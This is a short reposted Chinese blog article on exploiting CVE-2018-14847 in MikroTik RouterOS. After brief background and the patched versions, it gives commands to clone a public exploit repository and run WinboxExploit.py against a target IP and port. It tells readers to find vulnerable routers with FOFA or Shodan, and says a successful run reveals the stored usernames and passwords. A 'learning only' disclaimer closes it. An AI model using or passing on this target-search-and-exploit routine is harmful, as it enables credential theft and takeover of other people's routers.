CVE-2018-14847 简单利用
2020-01-21 10:47:51 Author: mp.weixin.qq.com(查看原文) 阅读量:82 收藏


MikroTik RouterOS是一个基于Linux开发的网络设备操作系统,兼容x86、ARM、MIPS等多种CPU架构,因此RouterOS也可以安装在PC上将其作为软路由,提供防火墙、VPN、无线网络等多种功能与服务。RouterOS提供了多种途径对其进行管理与配置,包括SSH、Telnet、Web界面(Webfig)与客户端软件(Winbox)等。

来自全球知名高科技网络安全公司Tenable的安全研究人员Jacob Baines针对CVE-2018-14847发布了一段新的概念验证(PoC)代码,实现了在受漏洞影响的MikroTik路由器上的远程代码执行。

影响范围

6.42.7以及6.40.9之前的所有Mikrotik RouterOS固件版本

修复方式

RouterOS版本6.40.9、6.42.7、6.43

漏洞利用

下载CVE-2018-14847

git clone 

https://github.com/jas502n/CVE-2018-14847

cd CVE-2018-14847

python WinboxExploit.py ip

利用FOFA搜索有漏洞的版本,ShoDan也可以。

搜索到目标后,利用CVE-2018-14847,语法为:


python3 WinboxExploit.py ip port

利用成功后会自动显示用户名和密码。

注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。

推荐文章++++

*CVE-2019-1388 简单利用

*CVE-2017-9805简单利用


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650459526&idx=3&sn=e83fb7f0bd82d4a386dccc7f42d1416b&chksm=83bba862b4cc2174bcaa9fbf0fdc9c7281ae007f0108ec82a5fb43abf62c367109270bd3d751#rd
如有侵权请联系:admin#unsafe.sh